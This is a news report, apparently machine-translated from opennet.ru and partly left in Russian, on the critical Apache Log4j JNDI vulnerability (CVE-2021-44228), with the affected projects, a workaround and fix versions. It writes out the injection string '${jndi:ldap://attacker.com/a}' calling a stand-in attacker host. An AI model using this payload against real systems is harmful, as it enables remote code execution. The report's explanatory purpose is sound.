Kohutav haavatavus Apache Log4j-s, mis mõjutab paljusid Java-projekte

Apache Log4j, populaarne logimise raamistik Java-rakendustes, on avastatud kriitiline haavatavus, mis võimaldab täita suvalist koodi, kui logitakse spetsiaalselt vormindatud väärtust vormingus «{jndi:URL}». Rünnak võib suunata Java-rakendustele, mis logivad väärtusi, mis on saadud välistest allikatest, näiteks probleemsete väärtuste väljastamine veateadetesse.

On märgitud, et probleemiga on haavatavad peaaegu kõik projektid, mis kasutavad selliseid raamistikku nagu Apache Struts, Apache Solr, Apache Druid või Apache Flink, sealhulgas Steam, Apple iCloud, Minecrafti kliendid ja serverid. Oodata on, et haavatavus võib põhjustada ulatuslikku rünnakute laine ettevõtte rakendustele, korrates kriitiliste haavatavuste ajalugu Apache Strutsi raamistikus, mida veebirakendustes kasutab hinnanguliselt 65% Fortune 100 ettevõtetest. Juba on registreeritud katseid võrgu skaneerimiseks haavatavate süsteemide leidmiseks.

Проблема усугубляется тем, что уже опубликован рабочий эксплоит, но исправления для стабильных веток на данный момент не сфромированы. СVE-идентификатор пока не присвоен. Исправление включено только в тестовую ветку log4j-2.15.0-rc1. В качестве обходного пути блокирования уязвимости рекомендуется выставить параметр log4j2.formatMsgNoLookups в значение true.

Проблема была вызвана тем, что log4j поддерживает обработку специальных масок «{}» в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой «${jndi:ldap://attacker.com/a}», при обработке которой log4j отправит на server attacker.com LDAP-запрос пути к Java-классу. Возвращённый serveriga атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

Дополнение 1: Уязвимости присвоен идентификатор CVE-2021-44228.

Lisa 2: Leidti turvameetmete ümbersõitmise meetod, mis on lisatud versioonile log4j-2.15.0-rc1. Uus värskendus log4j-2.15.0-rc2 on pakutud, et pakkuda põhjalikumat kaitset haavatavuse vastu. Koodis on esile tõstetud muudatus, mis on seotud äärmiselt toksilise JNDI URL-i vale vormindamise juhtumite käsitlemise puudumisega.

Allikas: opennet.ru

Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster